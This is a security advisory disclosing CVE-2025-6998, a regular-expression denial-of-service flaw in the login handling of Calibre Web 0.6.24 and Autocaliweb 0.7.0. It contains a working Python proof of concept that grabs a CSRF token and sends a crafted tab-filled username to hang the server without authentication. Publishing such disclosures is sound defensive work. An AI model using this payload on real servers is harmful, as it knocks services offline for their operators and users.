Calibre Web 0.6.24 - ReDoS

Description

A ReDoS vulnerability has been identified in version 0.6.24 (Nicolette) of the Calibre Web web application, located in the cps/string_helper.py file. This allows unauthenticated users to cause disruption simply by crafting and sending a payload while attempting to log in. The Autocaliweb version 0.7.0 has also been confirmed as vulnerable to the same attack.

Vulnerability

The issue lies in the strip_whitespaces() function in the cps/string_helper.py file, which uses a regular expression that is vulnerable to catastrophic backtracking when processing specially crafted input. This function is applied directly to the username parameter, both during login and as part of the rate-limiting logic via @limiter.limit(), making it exploitable without authentication.

This causes the backend to hang for a significant amount of time.

PoC

import requests
import re


target = "http://localhost:8083/login"
payload = '\x00' + ('\t' * 54773) + '\t\x00'

session = requests.Session()

# obtaining csrf_token
response = session.get(target)
csrf_token = re.search(r'name="csrf_token" value="([^"]+)"', response.text).group(1)

# sending payload
body = {
    "csrf_token": csrf_token,
    "username":   payload,
    "password":   "pwned"
}
response = session.post(target, data=body)

print(response.headers)

Evidence of Exploitation

Notice that using the same quantity of characters as a payload doesn't bring down the server, unlike using the ReDoS payload.

Autocaliweb is also vulnerable to the same attack:

Our security policy

We have reserved the ID CVE-2025-6998 to refer to this issue from now on.

Disclosure policy

System Information

Calibre Web:

• Version 0.6.24 (Nicolette)

• Operative System: Any

Autocaliweb:

• Version 0.7.0

References

Calibre Web:

• Github Repository: https://github.com/janeczku/calibre-web

• Security: https://github.com/janeczku/calibre-web/security

Autocaliweb:

• Github Repository: https://github.com/gelbphoenix/autocaliweb

• Security: https://github.com/gelbphoenix/autocaliweb/security/policy

Mitigation

There is currently no patch available for this vulnerability on Calibre Web project.

Autocaliweb version 0.7.1 has patched this vulnerability.

Credits

The vulnerability was discovered by Johan Giraldo from Fluid Attacks' Offensive Team.